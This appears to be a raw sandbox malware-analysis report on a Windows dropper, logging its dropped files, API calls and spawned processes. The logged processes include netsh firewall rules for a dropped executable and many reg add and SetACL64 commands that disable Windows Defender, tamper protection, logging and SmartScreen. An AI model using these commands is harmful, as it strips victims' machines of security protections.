Source: C:\Users\user\Desktop\4hIPvzV6a2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dllJump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exeJump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_7-43542
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeAPI coverage: 9.9 %
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeAPI coverage: 10.0 %
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe TID: 7164Thread sleep count: 145 > 30Jump to behavior
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,7_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868496D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF6868496D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68685CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF68685CF15
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68687C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,11_2_00007FF68687C76C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF6868496D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF6868496D0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF68685CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF68685CF15
Source: SetACL64.exe, 00000008.00000002.1714613888.000002638C5E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR2]P
Source: SetACL64.exe, 00000009.00000002.1716021658.000001530DE68000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000A.00000002.1717257209.000001C366348000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000B.00000002.1719792112.000001FBFF408000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000C.00000002.1721350752.000001CAB6A28000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000D.00000002.1727160550.00000251B90E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: netsh.exe, 00000003.00000002.1710218463.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1709848128.0000000000A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: netsh.exe, 00000001.00000003.1707240401.00000000011C1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000001.00000002.1707623146.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000007.00000002.1713569639.00000244CD3D4000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000E.00000002.1728315087.000001FD9D649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeAPI call chain: ExitProcess graph end nodegraph_0-3066
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868686C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF6868686C8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF68687D744 GetProcessHeap,7_2_00007FF68687D744
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868686C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF6868686C8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686863034 SetUnhandledExceptionFilter,7_2_00007FF686863034
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686862E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF686862E8C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686862AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF686862AE0
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF6868686C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF6868686C8
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686863034 SetUnhandledExceptionFilter,11_2_00007FF686863034
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686862E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF686862E8C
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 11_2_00007FF686862AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF686862AE0
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,privateJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,privateJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.batJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.batJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF6868580F6 SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,SetSecurityDescriptorSacl,GetLastError,MakeSelfRelativeSD,MakeSelfRelativeSD,GetLastError,_invalid_parameter_noinfo_noreturn,7_2_00007FF6868580F6
